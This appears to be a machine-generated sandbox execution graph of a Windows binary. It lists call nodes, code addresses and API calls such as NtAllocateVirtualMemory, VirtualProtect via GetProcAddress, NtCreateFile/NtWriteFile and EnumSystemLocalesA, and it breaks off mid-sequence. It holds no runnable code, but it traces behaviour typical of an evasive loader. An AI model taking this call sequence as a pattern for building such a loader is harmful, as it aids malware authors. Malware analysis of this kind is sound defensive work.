                                                                                                                              execution_graph 33009 28c4efe 33737 28a4824 33009->33737 33738 28a4835 33737->33738 33739 28a485b 33738->33739 33740 28a4872 33738->33740 33746 28a4b90 33739->33746 33755 28a4564 33740->33755 33743 28a4868 33744 28a48a3 33743->33744 33760 28a44f4 33743->33760 33747 28a4b9d 33746->33747 33754 28a4bcd 33746->33754 33749 28a4bc6 33747->33749 33750 28a4ba9 33747->33750 33751 28a4564 11 API calls 33749->33751 33766 28a2c44 11 API calls 33750->33766 33751->33754 33752 28a4bb7 33752->33743 33767 28a44a0 33754->33767 33756 28a4568 33755->33756 33757 28a458c 33755->33757 33772 28a2c10 11 API calls 33756->33772 33757->33743 33759 28a4575 33759->33743 33761 28a44f8 33760->33761 33764 28a4508 33760->33764 33763 28a4564 11 API calls 33761->33763 33761->33764 33762 28a4536 33762->33744 33763->33764 33764->33762 33773 28a2c2c 11 API calls 33764->33773 33766->33752 33768 28a44a6 33767->33768 33770 28a44c1 33767->33770 33768->33770 33771 28a2c2c 11 API calls 33768->33771 33770->33752 33771->33770 33772->33759 33773->33762 33774 28a1c6c 33775 28a1c7c 33774->33775 33776 28a1d04 33774->33776 33779 28a1c89 33775->33779 33780 28a1cc0 33775->33780 33777 28a1f58 33776->33777 33778 28a1d0d 33776->33778 33783 28a1fec 33777->33783 33784 28a1f68 33777->33784 33793 28a1fac 33777->33793 33786 28a1d25 33778->33786 33789 28a1e24 33778->33789 33782 28a1c94 33779->33782 33822 28a1724 33779->33822 33781 28a1724 10 API calls 33780->33781 33804 28a1cd7 33781->33804 33788 28a1724 10 API calls 33784->33788 33785 28a1d2c 33786->33785 33791 28a1d48 33786->33791 33796 28a1dfc 33786->33796 33811 28a1f82 33788->33811 33800 28a1e7c 33789->33800 33801 28a1e55 Sleep 33789->33801 33812 28a1e95 33789->33812 33790 28a1724 10 API calls 33808 28a1f2c 33790->33808 33802 28a1d79 Sleep 33791->33802 33814 28a1d9c 33791->33814 33792 28a1cfd 33794 28a1fb2 33793->33794 33797 28a1724 10 API calls 33793->33797 33795 28a1cb9 33798 28a1724 10 API calls 33796->33798 33813 28a1fc1 33797->33813 33816 28a1e05 33798->33816 33799 28a1fa7 33800->33790 33800->33812 33801->33800 33805 28a1e6f Sleep 33801->33805 33806 28a1d91 Sleep 33802->33806 33802->33814 33803 28a1ca1 33803->33795 33846 28a1a8c 33803->33846 33804->33792 33810 28a1a8c 8 API calls 33804->33810 33805->33789 33806->33791 33808->33812 33815 28a1a8c 8 API calls 33808->33815 33809 28a1e1d 33810->33792 33811->33799 33817 28a1a8c 8 API calls 33811->33817 33813->33799 33818 28a1a8c 8 API calls 33813->33818 33819 28a1f50 33815->33819 33816->33809 33820 28a1a8c 8 API calls 33816->33820 33817->33799 33821 28a1fe4 33818->33821 33820->33809 33823 28a1968 33822->33823 33824 28a173c 33822->33824 33825 28a1938 33823->33825 33826 28a1a80 33823->33826 33833 28a17cb Sleep 33824->33833 33834 28a174e 33824->33834 33830 28a1947 Sleep 33825->33830 33839 28a1986 33825->33839 33827 28a1a89 33826->33827 33828 28a1684 VirtualAlloc 33826->33828 33827->33803 33831 28a16bf 33828->33831 33832 28a16af 33828->33832 33829 28a175d 33829->33803 33836 28a195d Sleep 33830->33836 33830->33839 33831->33803 33863 28a1644 33832->33863 33833->33834 33838 28a17e4 Sleep 33833->33838 33834->33829 33835 28a182c 33834->33835 33840 28a180a Sleep 33834->33840 33845 28a1838 33835->33845 33869 28a15cc 33835->33869 33836->33825 33838->33824 33841 28a15cc VirtualAlloc 33839->33841 33843 28a19a4 33839->33843 33840->33835 33842 28a1820 Sleep 33840->33842 33841->33843 33842->33834 33843->33803 33845->33803 33847 28a1b6c 33846->33847 33848 28a1aa1 33846->33848 33849 28a16e8 33847->33849 33850 28a1aa7 33847->33850 33848->33850 33851 28a1b13 Sleep 33848->33851 33853 28a1c66 33849->33853 33856 28a1644 2 API calls 33849->33856 33852 28a1ab0 33850->33852 33855 28a1b4b Sleep 33850->33855 33860 28a1b81 33850->33860 33851->33850 33854 28a1b2d Sleep 33851->33854 33852->33795 33853->33795 33854->33848 33858 28a1b61 Sleep 33855->33858 33855->33860 33857 28a16f5 VirtualFree 33856->33857 33859 28a170d 33857->33859 33858->33850 33859->33795 33861 28a1c00 VirtualFree 33860->33861 33862 28a1ba4 33860->33862 33861->33795 33862->33795 33864 28a1681 33863->33864 33865 28a164d 33863->33865 33864->33831 33865->33864 33866 28a164f Sleep 33865->33866 33867 28a1664 33866->33867 33867->33864 33868 28a1668 Sleep 33867->33868 33868->33865 33873 28a1560 33869->33873 33871 28a15d4 VirtualAlloc 33872 28a15eb 33871->33872 33872->33845 33874 28a1500 33873->33874 33874->33871 33875 28ca2f4 33885 28a6530 33875->33885 33879 28ca322 33890 28c9b3c timeSetEvent 33879->33890 33881 28ca32c 33882 28ca33a GetMessageA 33881->33882 33883 28ca32e TranslateMessage DispatchMessageA 33882->33883 33884 28ca34a 33882->33884 33883->33882 33886 28a653b 33885->33886 33891 28a415c 33886->33891 33889 28a4270 SysAllocStringLen SysFreeString SysReAllocStringLen 33889->33879 33890->33881 33892 28a41a2 33891->33892 33893 28a421b 33892->33893 33894 28a43ac 33892->33894 33905 28a40f4 33893->33905 33897 28a43dd 33894->33897 33900 28a43ee 33894->33900 33910 28a4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33897->33910 33899 28a43e7 33899->33900 33901 28a4433 FreeLibrary 33900->33901 33902 28a4457 33900->33902 33901->33900 33903 28a4460 33902->33903 33904 28a4466 ExitProcess 33902->33904 33903->33904 33906 28a4137 33905->33906 33907 28a4104 33905->33907 33906->33889 33907->33906 33909 28a15cc VirtualAlloc 33907->33909 33911 28a582c 33907->33911 33909->33907 33910->33899 33912 28a583c GetModuleFileNameA 33911->33912 33913 28a5858 33911->33913 33915 28a5a90 GetModuleFileNameA RegOpenKeyExA 33912->33915 33913->33907 33916 28a5b13 33915->33916 33917 28a5ad3 RegOpenKeyExA 33915->33917 33933 28a58cc 12 API calls 33916->33933 33917->33916 33918 28a5af1 RegOpenKeyExA 33917->33918 33918->33916 33920 28a5b9c lstrcpynA GetThreadLocale GetLocaleInfoA 33918->33920 33922 28a5bd3 33920->33922 33923 28a5cb6 33920->33923 33921 28a5b38 RegQueryValueExA 33924 28a5b76 RegCloseKey 33921->33924 33925 28a5b58 RegQueryValueExA 33921->33925 33922->33923 33926 28a5be3 lstrlenA 33922->33926 33923->33913 33924->33913 33925->33924 33928 28a5bfb 33926->33928 33928->33923 33929 28a5c48 33928->33929 33930 28a5c20 lstrcpynA LoadLibraryExA 33928->33930 33929->33923 33931 28a5c52 lstrcpynA LoadLibraryExA 33929->33931 33930->33929 33931->33923 33932 28a5c84 lstrcpynA LoadLibraryExA 33931->33932 33932->33923 33933->33921 33934 28a4ea0 33935 28a4ead 33934->33935 33939 28a4eb4 33934->33939 33943 28a4bf4 SysAllocStringLen 33935->33943 33940 28a4c14 33939->33940 33941 28a4c1a SysFreeString 33940->33941 33942 28a4c20 33940->33942 33941->33942 33943->33939 33944 28a4c60 33945 28a4c87 33944->33945 33946 28a4c64 33944->33946 33947 28a4c24 33946->33947 33948 28a4c77 SysReAllocStringLen 33946->33948 33949 28a4c2a SysFreeString 33947->33949 33950 28a4c38 33947->33950 33948->33945 33951 28a4bf4 33948->33951 33949->33950 33952 28a4c10 33951->33952 33953 28a4c00 SysAllocStringLen 33951->33953 33953->33951 33953->33952 33954 28c5fa0 33955 28a4824 11 API calls 33954->33955 33956 28c5fc1 33955->33956 34501 28a47b0 33956->34501 33958 28c5ff8 34516 28b7be8 33958->34516 33961 28a4824 11 API calls 33962 28c603d 33961->33962 33963 28a47b0 11 API calls 33962->33963 33964 28c6074 33963->33964 33965 28b7be8 17 API calls 33964->33965 33966 28c6098 33965->33966 33967 28a4824 11 API calls 33966->33967 33968 28c60b9 33967->33968 33969 28a47b0 11 API calls 33968->33969 33970 28c60f0 33969->33970 33971 28b7be8 17 API calls 33970->33971 33972 28c6114 33971->33972 33973 28a4824 11 API calls 33972->33973 33974 28c6135 33973->33974 33975 28a47b0 11 API calls 33974->33975 33976 28c616c 33975->33976 33977 28c6190 33976->33977 33978 28b7be8 17 API calls 33976->33978 33979 28a4824 11 API calls 33977->33979 33978->33977 33980 28c61b1 33979->33980 33981 28a47b0 11 API calls 33980->33981 33982 28c61e8 33981->33982 33983 28b7be8 17 API calls 33982->33983 33984 28c620c 33983->33984 33985 28a4824 11 API calls 33984->33985 33986 28c622d 33985->33986 33987 28a47b0 11 API calls 33986->33987 33988 28c6264 33987->33988 33989 28b7be8 17 API calls 33988->33989 33990 28c6288 33989->33990 33991 28a4824 11 API calls 33990->33991 33992 28c62a9 33991->33992 33993 28a47b0 11 API calls 33992->33993 33994 28c62e0 33993->33994 33995 28b7be8 17 API calls 33994->33995 33996 28c6304 33995->33996 33997 28a4824 11 API calls 33996->33997 33998 28c6325 33997->33998 33999 28a47b0 11 API calls 33998->33999 34000 28c635c 33999->34000 34001 28b7be8 17 API calls 34000->34001 34003 28c6380 34001->34003 34002 28c6b54 34004 28a4824 11 API calls 34002->34004 34003->34002 34005 28a4824 11 API calls 34003->34005 34006 28c6b75 34004->34006 34007 28c63b6 34005->34007 34008 28a47b0 11 API calls 34006->34008 34009 28a47b0 11 API calls 34007->34009 34010 28c6bac 34008->34010 34011 28c63ed 34009->34011 34012 28b7be8 17 API calls 34010->34012 34013 28b7be8 17 API calls 34011->34013 34014 28c6bd0 34012->34014 34015 28c6411 34013->34015 34016 28a4824 11 API calls 34014->34016 34017 28a4824 11 API calls 34015->34017 34018 28c6bf1 34016->34018 34019 28c6432 34017->34019 34020 28a47b0 11 API calls 34018->34020 34021 28a47b0 11 API calls 34019->34021 34022 28c6c28 34020->34022 34023 28c6469 34021->34023 34024 28b7be8 17 API calls 34022->34024 34025 28b7be8 17 API calls 34023->34025 34026 28c6c4c 34024->34026 34027 28c648d 34025->34027 34028 28a4824 11 API calls 34026->34028 34029 28a4824 11 API calls 34027->34029 34030 28c6c6d 34028->34030 34031 28c64ae 34029->34031 34032 28a47b0 11 API calls 34030->34032 34033 28a47b0 11 API calls 34031->34033 34034 28c6ca4 34032->34034 34035 28c64e5 34033->34035 34036 28b7be8 17 API calls 34034->34036 34037 28b7be8 17 API calls 34035->34037 34043 28c6cc8 34036->34043 34038 28c6509 34037->34038 34039 28a4824 11 API calls 34038->34039 34042 28c652a 34039->34042 34040 28c74a8 34041 28a4824 11 API calls 34040->34041 34046 28c74c9 34041->34046 34045 28a47b0 11 API calls 34042->34045 34043->34040 34044 28a4824 11 API calls 34043->34044 34048 28c6d13 34044->34048 34049 28c6561 34045->34049 34047 28a47b0 11 API calls 34046->34047 34053 28c7500 34047->34053 34050 28a47b0 11 API calls 34048->34050 34051 28b7be8 17 API calls 34049->34051 34056 28c6d4a 34050->34056 34052 28c6585 34051->34052 34054 28a4824 11 API calls 34052->34054 34055 28b7be8 17 API calls 34053->34055 34060 28c65a6 34054->34060 34057 28c7524 34055->34057 34059 28b7be8 17 API calls 34056->34059 34058 28a4824 11 API calls 34057->34058 34064 28c7545 34058->34064 34061 28c6d6e 34059->34061 34063 28a47b0 11 API calls 34060->34063 34062 28a4824 11 API calls 34061->34062 34066 28c6d8f 34062->34066 34067 28c65dd 34063->34067 34065 28a47b0 11 API calls 34064->34065 34071 28c757c 34065->34071 34068 28a47b0 11 API calls 34066->34068 34069 28b7be8 17 API calls 34067->34069 34074 28c6dc6 34068->34074 34070 28c6601 34069->34070 34072 28a4824 11 API calls 34070->34072 34073 28b7be8 17 API calls 34071->34073 34078 28c6622 34072->34078 34075 28c75a0 34073->34075 34077 28b7be8 17 API calls 34074->34077 34076 28a4824 11 API calls 34075->34076 34082 28c75c1 34076->34082 34079 28c6dea 34077->34079 34081 28a47b0 11 API calls 34078->34081 34080 28a4824 11 API calls 34079->34080 34084 28c6e0b 34080->34084 34085 28c6659 34081->34085 34083 28a47b0 11 API calls 34082->34083 34089 28c75f8 34083->34089 34086 28a47b0 11 API calls 34084->34086 34087 28b7be8 17 API calls 34085->34087 34093 28c6e42 34086->34093 34088 28c667d 34087->34088 34525 28a2ee0 QueryPerformanceCounter 34088->34525 34092 28b7be8 17 API calls 34089->34092 34091 28c6682 34095 28a4824 11 API calls 34091->34095 34097 28c761c 34092->34097 34094 28b7be8 17 API calls 34093->34094 34096 28c6e66 34094->34096 34102 28c66bb 34095->34102 34535 28bd198 34096->34535 34100 28b7be8 17 API calls 34097->34100 34104 28c764f 34100->34104 34101 28a4824 11 API calls 34105 28c6eaa 34101->34105 34103 28a47b0 11 API calls 34102->34103 34108 28c66f2 34103->34108 34106 28b7be8 17 API calls 34104->34106 34107 28a4824 11 API calls 34105->34107 34111 28c7682 34106->34111 34112 28c6ee2 34107->34112 34109 28b7be8 17 API calls 34108->34109 34110 28c6716 34109->34110 34113 28a4824 11 API calls 34110->34113 34114 28b7be8 17 API calls 34111->34114 34115 28a47b0 11 API calls 34112->34115 34116 28c6737 34113->34116 34117 28c76b5 34114->34117 34118 28c6f19 34115->34118 34119 28a47b0 11 API calls 34116->34119 34120 28b7be8 17 API calls 34117->34120 34122 28b7be8 17 API calls 34118->34122 34126 28c676e 34119->34126 34121 28c76e8 34120->34121 34123 28a4824 11 API calls 34121->34123 34124 28c6f3d 34122->34124 34129 28c7709 34123->34129 34125 28a4824 11 API calls 34124->34125 34130 28c6f5e 34125->34130 34127 28b7be8 17 API calls 34126->34127 34128 28c6792 34127->34128 34131 28a4824 11 API calls 34128->34131 34132 28a47b0 11 API calls 34129->34132 34133 28a47b0 11 API calls 34130->34133 34134 28c67b3 34131->34134 34135 28c7740 34132->34135 34136 28c6f95 34133->34136 34137 28a47b0 11 API calls 34134->34137 34138 28b7be8 17 API calls 34135->34138 34139 28b7be8 17 API calls 34136->34139 34144 28c67ea 34137->34144 34140 28c7764 34138->34140 34141 28c6fb9 34139->34141 34142 28a4824 11 API calls 34140->34142 34542 28a7e18 34141->34542 34152 28c7785 34142->34152 34148 28b7be8 17 API calls 34144->34148 34146 28c6fcb 34149 28a4824 11 API calls 34146->34149 34147 28c72a2 34151 28a4824 11 API calls 34147->34151 34150 28c680e GetCurrentProcess 34148->34150 34157 28c6fec 34149->34157 34528 28b7968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 34150->34528 34158 28c72c3 34151->34158 34155 28a47b0 11 API calls 34152->34155 34154 28c6828 34156 28a4824 11 API calls 34154->34156 34161 28c77bc 34155->34161 34162 28c684e 34156->34162 34159 28a47b0 11 API calls 34157->34159 34160 28a47b0 11 API calls 34158->34160 34166 28c7023 34159->34166 34167 28c72fa 34160->34167 34163 28b7be8 17 API calls 34161->34163 34164 28a47b0 11 API calls 34162->34164 34165 28c77e0 34163->34165 34173 28c6885 34164->34173 34168 28a4824 11 API calls 34165->34168 34169 28b7be8 17 API calls 34166->34169 34170 28b7be8 17 API calls 34167->34170 34175 28c7801 34168->34175 34172 28c7047 34169->34172 34171 28c731e 34170->34171 34174 28a4824 11 API calls 34171->34174 34176 28a4824 11 API calls 34172->34176 34177 28b7be8 17 API calls 34173->34177 34182 28c733f 34174->34182 34179 28a47b0 11 API calls 34175->34179 34181 28c7068 34176->34181 34178 28c68a9 34177->34178 34180 28a4824 11 API calls 34178->34180 34185 28c7838 34179->34185 34186 28c68ca 34180->34186 34183 28a47b0 11 API calls 34181->34183 34184 28a47b0 11 API calls 34182->34184 34189 28c709f 34183->34189 34190 28c7376 34184->34190 34187 28b7be8 17 API calls 34185->34187 34188 28a47b0 11 API calls 34186->34188 34193 28c785c 34187->34193 34195 28c6901 34188->34195 34191 28b7be8 17 API calls 34189->34191 34192 28b7be8 17 API calls 34190->34192 34194 28c70c3 34191->34194 34196 28c739a 34192->34196 34199 28b7be8 17 API calls 34193->34199 34197 28a4824 11 API calls 34194->34197 34200 28b7be8 17 API calls 34195->34200 34198 28a4824 11 API calls 34196->34198 34203 28c70e4 34197->34203 34204 28c73bb 34198->34204 34205 28c788f 34199->34205 34201 28c6925 34200->34201 34202 28a4824 11 API calls 34201->34202 34209 28c6946 34202->34209 34206 28a47b0 11 API calls 34203->34206 34207 28a47b0 11 API calls 34204->34207 34208 28b7be8 17 API calls 34205->34208 34211 28c711b 34206->34211 34212 28c73f2 34207->34212 34213 28c78c2 34208->34213 34210 28a47b0 11 API calls 34209->34210 34218 28c697d 34210->34218 34214 28b7be8 17 API calls 34211->34214 34215 28b7be8 17 API calls 34212->34215 34216 28b7be8 17 API calls 34213->34216 34217 28c713f 34214->34217 34219 28c7416 34215->34219 34226 28c78f5 34216->34226 34546 28bc74c 34217->34546 34223 28b7be8 17 API calls 34218->34223 34221 28a4824 11 API calls 34219->34221 34228 28c7437 34221->34228 34225 28c69a1 34223->34225 34224 28a44f4 11 API calls 34227 28c7164 34224->34227 34529 28a49bc 34225->34529 34229 28b7be8 17 API calls 34226->34229 34231 28a4824 11 API calls 34227->34231 34233 28a47b0 11 API calls 34228->34233 34235 28c7928 34229->34235 34234 28c7185 34231->34234 34232 28c69c5 34236 28a4824 11 API calls 34232->34236 34238 28c746e 34233->34238 34237 28a47b0 11 API calls 34234->34237 34239 28b7be8 17 API calls 34235->34239 34243 28c69f4 34236->34243 34245 28c71bc 34237->34245 34241 28b7be8 17 API calls 34238->34241 34240 28c795b 34239->34240 34242 28a4824 11 API calls 34240->34242 34244 28c7492 34241->34244 34251 28c797c 34242->34251 34247 28a47b0 11 API calls 34243->34247 34246 28a49bc 11 API calls 34244->34246 34249 28b7be8 17 API calls 34245->34249 34248 28c749c 34246->34248 34255 28c6a2b 34247->34255 34566 28b7f48 35 API calls 34248->34566 34252 28c71e0 34249->34252 34254 28a47b0 11 API calls 34251->34254 34253 28a4824 11 API calls 34252->34253 34258 28c7201 34253->34258 34259 28c79b3 34254->34259 34256 28b7be8 17 API calls 34255->34256 34257 28c6a4f 34256->34257 34260 28a4824 11 API calls 34257->34260 34261 28a47b0 11 API calls 34258->34261 34262 28b7be8 17 API calls 34259->34262 34265 28c6a70 34260->34265 34266 28c7238 34261->34266 34263 28c79d7 34262->34263 34264 28a4824 11 API calls 34263->34264 34269 28c79f8 34264->34269 34267 28a47b0 11 API calls 34265->34267 34268 28b7be8 17 API calls 34266->34268 34271 28c6aa7 34267->34271 34276 28c725c 34268->34276 34270 28a47b0 11 API calls 34269->34270 34274 28c7a2f 34270->34274 34272 28b7be8 17 API calls 34271->34272 34273 28c6acb 34272->34273 34275 28a4824 11 API calls 34273->34275 34278 28b7be8 17 API calls 34274->34278 34279 28c6aec 34275->34279 34551 28bc3f8 34276->34551 34280 28c7a53 34278->34280 34281 28a47b0 11 API calls 34279->34281 34282 28b7be8 17 API calls 34280->34282 34285 28c6b23 34281->34285 34283 28c7a86 34282->34283 34284 28a4824 11 API calls 34283->34284 34288 28c7aa7 34284->34288 34286 28b7be8 17 API calls 34285->34286 34287 28c6b47 EnumSystemLocalesA 34286->34287 34287->34002 34289 28a47b0 11 API calls 34288->34289 34290 28c7ade 34289->34290 34291 28b7be8 17 API calls 34290->34291 34292 28c7b02 34291->34292 34293 28a4824 11 API calls 34292->34293 34294 28c7b23 34293->34294 34295 28a47b0 11 API calls 34294->34295 34296 28c7b5a 34295->34296 34297 28b7be8 17 API calls 34296->34297 34298 28c7b7e 34297->34298 34299 28a4824 11 API calls 34298->34299 34300 28c7b9f 34299->34300 34301 28a47b0 11 API calls 34300->34301 34302 28c7bd6 34301->34302 34303 28b7be8 17 API calls 34302->34303 34304 28c7bfa 34303->34304 34305 28b7be8 17 API calls 34304->34305 34306 28c7c2d 34305->34306 34307 28b7be8 17 API calls 34306->34307 34308 28c7c60 34307->34308 34309 28b7be8 17 API calls 34308->34309 34310 28c7c93 34309->34310 34311 28b7be8 17 API calls 34310->34311 34312 28c7cc6 34311->34312 34313 28a4824 11 API calls 34312->34313 34314 28c7ce7 34313->34314 34315 28a47b0 11 API calls 34314->34315 34316 28c7d1e 34315->34316 34317 28b7be8 17 API calls 34316->34317 34318 28c7d42 34317->34318 34319 28a4824 11 API calls 34318->34319 34320 28c7d63 34319->34320 34321 28a47b0 11 API calls 34320->34321 34322 28c7d9a 34321->34322 34323 28b7be8 17 API calls 34322->34323 34324 28c7dbe 34323->34324 34325 28b7be8 17 API calls 34324->34325 34326 28c7df1 34325->34326 34327 28b7be8 17 API calls 34326->34327 34328 28c7e24 34327->34328 34329 28b7be8 17 API calls 34328->34329 34330 28c7e57 34329->34330 34331 28b7be8 17 API calls 34330->34331 34332 28c7e8a 34331->34332 34333 28b7be8 17 API calls 34332->34333 34334 28c7ebd 34333->34334 34335 28a4824 11 API calls 34334->34335 34336 28c7ede 34335->34336 34337 28a47b0 11 API calls 34336->34337 34338 28c7f15 34337->34338 34339 28b7be8 17 API calls 34338->34339 34340 28c7f39 34339->34340 34341 28a4824 11 API calls 34340->34341 34342 28c7f5a 34341->34342 34343 28a47b0 11 API calls 34342->34343 34344 28c7f91 34343->34344 34345 28b7be8 17 API calls 34344->34345 34346 28c7fb5 34345->34346 34347 28a4824 11 API calls 34346->34347 34348 28c7fd6 34347->34348 34349 28a47b0 11 API calls 34348->34349 34350 28c800d 34349->34350 34351 28b7be8 17 API calls 34350->34351 34352 28c8031 34351->34352 34353 28a4824 11 API calls 34352->34353 34354 28c8052 34353->34354 34355 28a47b0 11 API calls 34354->34355 34356 28c8089 34355->34356 34357 28b7be8 17 API calls 34356->34357 34358 28c80ad 34357->34358 34359 28a4824 11 API calls 34358->34359 34360 28c80ce 34359->34360 34361 28a47b0 11 API calls 34360->34361 34362 28c8105 34361->34362 34363 28b7be8 17 API calls 34362->34363 34364 28c8129 34363->34364 34365 28b7be8 17 API calls 34364->34365 34366 28c8138 34365->34366 34367 28b7be8 17 API calls 34366->34367 34368 28c8147 34367->34368 34369 28b7be8 17 API calls 34368->34369 34370 28c8156 34369->34370 34371 28b7be8 17 API calls 34370->34371 34372 28c8165 34371->34372 34373 28b7be8 17 API calls 34372->34373 34374 28c8174 34373->34374 34375 28b7be8 17 API calls 34374->34375 34376 28c8183 34375->34376 34377 28b7be8 17 API calls 34376->34377 34378 28c8192 34377->34378 34379 28b7be8 17 API calls 34378->34379 34380 28c81a1 34379->34380 34381 28b7be8 17 API calls 34380->34381 34382 28c81b0 34381->34382 34383 28b7be8 17 API calls 34382->34383 34384 28c81bf 34383->34384 34385 28b7be8 17 API calls 34384->34385 34386 28c81ce 34385->34386 34387 28b7be8 17 API calls 34386->34387 34388 28c81dd 34387->34388 34389 28b7be8 17 API calls 34388->34389 34390 28c81ec 34389->34390 34391 28b7be8 17 API calls 34390->34391 34392 28c81fb 34391->34392 34393 28b7be8 17 API calls 34392->34393 34394 28c820a 34393->34394 34395 28a4824 11 API calls 34394->34395 34396 28c822b 34395->34396 34397 28a47b0 11 API calls 34396->34397 34398 28c8262 34397->34398 34399 28b7be8 17 API calls 34398->34399 34400 28c8286 34399->34400 34401 28a4824 11 API calls 34400->34401 34402 28c82a7 34401->34402 34403 28a47b0 11 API calls 34402->34403 34404 28c82de 34403->34404 34405 28b7be8 17 API calls 34404->34405 34406 28c8302 34405->34406 34407 28a4824 11 API calls 34406->34407 34408 28c8323 34407->34408 34409 28a47b0 11 API calls 34408->34409 34410 28c835a 34409->34410 34411 28b7be8 17 API calls 34410->34411 34412 28c837e 34411->34412 34413 28b7be8 17 API calls 34412->34413 34414 28c83b1 34413->34414 34415 28b7be8 17 API calls 34414->34415 34416 28c83e4 34415->34416 34417 28b7be8 17 API calls 34416->34417 34418 28c8417 34417->34418 34419 28b7be8 17 API calls 34418->34419 34420 28c844a 34419->34420 34421 28b7be8 17 API calls 34420->34421 34422 28c847d 34421->34422 34423 28b7be8 17 API calls 34422->34423 34424 28c84b0 34423->34424 34425 28b7be8 17 API calls 34424->34425 34426 28c84e3 34425->34426 34427 28a4824 11 API calls 34426->34427 34428 28c8504 34427->34428 34429 28a47b0 11 API calls 34428->34429 34430 28c853b 34429->34430 34431 28b7be8 17 API calls 34430->34431 34432 28c855f 34431->34432 34433 28a4824 11 API calls 34432->34433 34434 28c8580 34433->34434 34435 28a47b0 11 API calls 34434->34435 34436 28c85b7 34435->34436 34437 28b7be8 17 API calls 34436->34437 34438 28c85db 34437->34438 34439 28a4824 11 API calls 34438->34439 34440 28c85fc 34439->34440 34441 28a47b0 11 API calls 34440->34441 34442 28c8633 34441->34442 34443 28b7be8 17 API calls 34442->34443 34444 28c8657 34443->34444 34445 28b7be8 17 API calls 34444->34445 34446 28c868a 34445->34446 34447 28b7be8 17 API calls 34446->34447 34448 28c86bd 34447->34448 34449 28b7be8 17 API calls 34448->34449 34450 28c86f0 34449->34450 34451 28b7be8 17 API calls 34450->34451 34452 28c8723 34451->34452 34453 28b7be8 17 API calls 34452->34453 34454 28c8756 34453->34454 34455 28b7be8 17 API calls 34454->34455 34456 28c8789 34455->34456 34457 28b7be8 17 API calls 34456->34457 34458 28c87bc 34457->34458 34459 28b7be8 17 API calls 34458->34459 34460 28c87ef 34459->34460 34461 28b7be8 17 API calls 34460->34461 34462 28c8822 34461->34462 34463 28b7be8 17 API calls 34462->34463 34464 28c8855 34463->34464 34465 28b7be8 17 API calls 34464->34465 34466 28c8888 34465->34466 34467 28b7be8 17 API calls 34466->34467 34468 28c88bb 34467->34468 34469 28b7be8 17 API calls 34468->34469 34470 28c88ee 34469->34470 34471 28b7be8 17 API calls 34470->34471 34472 28c8921 34471->34472 34473 28b7be8 17 API calls 34472->34473 34474 28c8954 34473->34474 34475 28b7be8 17 API calls 34474->34475 34476 28c8987 34475->34476 34477 28b7be8 17 API calls 34476->34477 34478 28c89ba 34477->34478 34479 28b7be8 17 API calls 34478->34479 34480 28c89ed 34479->34480 34481 28b7be8 17 API calls 34480->34481 34482 28c8a20 34481->34482 34483 28a4824 11 API calls 34482->34483 34484 28c8a41 34483->34484 34485 28a47b0 11 API calls 34484->34485 34486 28c8a78 34485->34486 34487 28b7be8 17 API calls 34486->34487 34488 28c8a9c 34487->34488 34489 28a4824 11 API calls 34488->34489 34490 28c8abd 34489->34490 34491 28a47b0 11 API calls 34490->34491 34492 28c8af4 34491->34492 34493 28b7be8 17 API calls 34492->34493 34494 28c8b18 34493->34494 34495 28a4824 11 API calls 34494->34495 34496 28c8b39 34495->34496 34497 28a47b0 11 API calls 34496->34497 34498 28c8b70 34497->34498 34499 28b7be8 17 API calls 34498->34499 34500 28c8b94 ExitProcess 34499->34500 34502 28a47b4 34501->34502 34503 28a4815 34501->34503 34504 28a47bc 34502->34504 34505 28a44f4 34502->34505 34504->34503 34506 28a47cb 34504->34506 34508 28a44f4 11 API calls 34504->34508 34509 28a4564 11 API calls 34505->34509 34511 28a4508 34505->34511 34510 28a4564 11 API calls 34506->34510 34507 28a4536 34507->33958 34508->34506 34509->34511 34513 28a47e5 34510->34513 34511->34507 34567 28a2c2c 11 API calls 34511->34567 34514 28a44f4 11 API calls 34513->34514 34515 28a4811 34514->34515 34515->33958 34517 28b7bfd 34516->34517 34518 28b7c05 LoadLibraryW GetModuleHandleW 34517->34518 34568 28a4964 34518->34568 34522 28b7c57 34579 28a44c4 34522->34579 34526 28a2ef8 GetTickCount 34525->34526 34527 28a2eed 34525->34527 34526->34091 34527->34091 34528->34154 34530 28a4970 34529->34530 34531 28a49ab 34530->34531 34532 28a4564 11 API calls 34530->34532 34531->34232 34533 28a4987 34532->34533 34533->34531 34589 28a2c2c 11 API calls 34533->34589 34536 28bd1bd 34535->34536 34537 28bd1e9 34536->34537 34590 28a4688 11 API calls 34536->34590 34591 28a44f4 11 API calls 34536->34591 34538 28a44a0 11 API calls 34537->34538 34540 28bd1fe 34538->34540 34540->34101 34543 28a4964 34542->34543 34544 28a7e22 GetFileAttributesA 34543->34544 34545 28a7e2d 34544->34545 34545->34146 34545->34147 34547 28a4b90 11 API calls 34546->34547 34548 28bc764 34547->34548 34549 28bc785 34548->34549 34550 28a49bc 11 API calls 34548->34550 34549->34224 34550->34548 34552 28bc40e 34551->34552 34592 28a4ee4 34552->34592 34554 28bc416 34555 28bc436 RtlDosPathNameToNtPathName_U 34554->34555 34598 28bc340 34555->34598 34557 28bc452 NtCreateFile 34558 28bc47d 34557->34558 34559 28a49bc 11 API calls 34558->34559 34560 28bc48f NtWriteFile NtClose 34559->34560 34561 28bc4b9 34560->34561 34599 28a4c24 34561->34599 34564 28a44a0 11 API calls 34565 28bc4c9 34564->34565 34565->34147 34566->34040 34567->34507 34569 28a4968 GetProcAddress 34568->34569 34570 28b7b20 34569->34570 34583 28a4538 34570->34583 34573 28a47b0 11 API calls 34574 28b7b53 34573->34574 34575 28b7b5b GetModuleHandleA GetProcAddress VirtualProtect 34574->34575 34576 28b7b97 34575->34576 34577 28a44c4 11 API calls 34576->34577 34578 28b7ba4 34577->34578 34578->34522 34581 28a44ca 34579->34581 34580 28a44f0 34580->33961 34581->34580 34588 28a2c2c 11 API calls 34581->34588 34585 28a453c 34583->34585 34584 28a4560 34584->34573 34585->34584 34587 28a2c2c 11 API calls 34585->34587 34587->34584 34588->34581 34589->34531 34590->34536 34591->34536 34593 28a4eea SysAllocStringLen 34592->34593 34594 28a4f00 34592->34594 34593->34594 34595 28a4bf4 34593->34595 34594->34554 34596 28a4c10 34595->34596 34597 28a4c00 SysAllocStringLen 34595->34597 34596->34554 34597->34595 34597->34596 34598->34557 34600 28a4c2a SysFreeString 34599->34600 34601 28a4c38 34599->34601 34600->34601 34601->34564 34602 28c1ac0 34603 28a4824 11 API calls 34602->34603 34604 28c1ae1 34603->34604 34605 28c1aec 34604->34605 34606 28c1af9 34605->34606 34607 28a47b0 11 API calls 34606->34607 34608 28c1b18 34607->34608 34609 